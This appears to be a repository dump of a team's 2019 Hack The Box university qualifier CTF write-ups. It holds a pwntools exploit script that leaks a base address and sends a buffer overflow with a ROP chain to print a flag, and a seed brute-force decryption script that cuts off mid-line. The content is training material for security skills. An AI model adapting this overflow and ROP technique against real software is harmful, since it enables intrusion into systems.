├── 2019 └── HTBxUNI Qualifier │ ├── HTBxUNI_RWX_WriteUp.pdf │ └── files │ ├── lab.py │ ├── superseed.py │ └── tarzan.py └── README.md /2019/HTBxUNI Qualifier/HTBxUNI_RWX_WriteUp.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RWX-CTF/ctf-writeups/a79f8493c6f0a1f141c82d4ed8de930985c67d6c/2019/HTBxUNI Qualifier/HTBxUNI_RWX_WriteUp.pdf -------------------------------------------------------------------------------- /2019/HTBxUNI Qualifier/files/lab.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import pwn 5 | 6 | from pwnlib.util.misc import run_in_new_terminal 7 | 8 | # ==================================================================== 9 | # CONFIGURATION PARAMETERS 10 | # These are to be adjusted to fit the challenge: 11 | # binary : path to a sample of the challenge binary 12 | # libc : path to the libc the program uses (if known) 13 | # host : hostname where the challenge is running 14 | # port : port where the challenge is listenting 15 | # ==================================================================== 16 | 17 | binary = './lab' 18 | libc = None 19 | host = 'docker.hackthebox.eu' 20 | port = 32435 21 | 22 | # ==================================================================== 23 | # GLOBALS 24 | # ==================================================================== 25 | 26 | T = None # The Target 27 | LIBC = None # Libc ELF 28 | BIN = None # Target binary ELF 29 | 30 | # ==================================================================== 31 | # CLASSES AND FUNCTIONS 32 | # ==================================================================== 33 | 34 | class Target: 35 | ''' 36 | Code that interacts with the challenge. 37 | ''' 38 | 39 | def __init__(self, remote, binary=None, libc=None, host=None, port=None, *a, **kw): 40 | if not remote: # Local binary 41 | self.tube = pwn.process(binary, *a, **kw) if libc is None else \ 42 | pwn.process(binary, env={'LD_PRELOAD': libc}, *a, **kw) 43 | else: # Remote challenge 44 | self.tube = pwn.remote(host, port) 45 | 46 | def __getattr__(self, attr): 47 | ''' Catch references to pwn.tube methods such as recvuntil, etc ''' 48 | return self.tube.__getattribute__(attr) 49 | 50 | def attach(self): 51 | ''' Attach to the running process in a radare2 session ''' 52 | if isinstance(self.tube, pwn.process): # Only attach if we are running a binary 53 | run_in_new_terminal('r2 -AAA -d %d' % self.tube.pid) 54 | raw_input('PAUSED [PRESS ENTER TO CONTINUE]') 55 | 56 | # ================================================================ 57 | # CUSTOM ACTIONS: For easy interaction with the challenge 58 | # ================================================================ 59 | 60 | 61 | def parse_args(): 62 | ''' Parse program arguments ''' 63 | global port 64 | parser = argparse.ArgumentParser(usage='%(prog)s [OPTIONS]') 65 | parser.add_argument('-r', '--remote', help='Attack to the remote target', action='store_true') 66 | parser.add_argument('-p', '--port', help='Remote target port', nargs='?', type=int, default=port) 67 | return parser.parse_args() 68 | 69 | # ==================================================================== 70 | # MAIN -- FLOW OF THE PROGRAM 71 | # ==================================================================== 72 | 73 | if __name__ == '__main__': 74 | 75 | # ================================================================ 76 | # INITIALIZATION 77 | # ================================================================ 78 | 79 | args = parse_args() 80 | if libc is not None: 81 | LIBC = pwn.ELF(libc, checksec=False) 82 | if binary is not None: 83 | BIN = pwn.ELF(binary, checksec=False) 84 | 85 | T = Target(args.remote, binary, libc, host, args.port) 86 | 87 | # =============================================================== 88 | # EXPLOIT STARTS HERE 89 | # =============================================================== 90 | 91 | # Useful gadgets. 92 | POP_GADGET = 0x1402 # pop edi; pop ebp; ret 93 | MOV_GADGET = 0x1216 # mov dword [edi], ebp; ret 94 | 95 | # (1) Get main() address. 96 | T.recvuntil('Main is at ') 97 | BIN.address = int(T.recvline(), 16) - BIN.sym['main'] 98 | T.info(f'base @ {hex(BIN.address)}') 99 | 100 | # (2) ROP chain: 101 | # - Set userid to 0x1337 102 | # - Set labOwner to 'QHpix' 103 | # - Call checkLabOwner to print the flag 104 | p32 = lambda x: pwn.p32(BIN.address + x) # pack using BIN.address 105 | rop = p32(POP_GADGET) + pwn.p32(BIN.sym['userid']) + pwn.p32(0x1337) + p32(MOV_GADGET) 106 | rop += p32(POP_GADGET) + pwn.p32(BIN.sym['labOwner']) + b'QHpi' + p32(MOV_GADGET) 107 | rop += p32(POP_GADGET) + pwn.p32(BIN.sym['labOwner'] + 4) + pwn.p32(0x78) + p32(MOV_GADGET) 108 | rop += pwn.p32(BIN.sym['checkLabOwner']) 109 | 110 | T.sendlineafter('Enter your input: ', b'A' * 0x4c + rop) 111 | T.success(T.recvall()) 112 | -------------------------------------------------------------------------------- /2019/HTBxUNI Qualifier/files/superseed.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # *.* coding: utf-8 *.* 3 | 4 | import random 5 | import struct 6 | 7 | ''' 8 | Challenge superseed - Hack The Box - CTF 9 | ''' 10 | 11 | def solve(seed, cipher): 12 | random.seed(seed) 13 | 14 | plain = '' 15 | for c in cipher: 16 | plain += chr(ord(c) - random.randrange(512)) 17 | 18 | print(plain) 19 | 20 | 21 | def bruteforce(cipher): 22 | # Subtract each character from 'HTB{' from the ciphertext to get the 23 | # key's first four numbers. 24 | key = [ ord(cipher[i]) - ord(c) for i, c in enumerate('HTB{') ] 25 | 26 | try: 27 | for i in range(0, 0xffffff): 28 | print(f'\x1b[K[*] guess : {hex(i)}', end='\r') 29 | random.seed(struct.pack('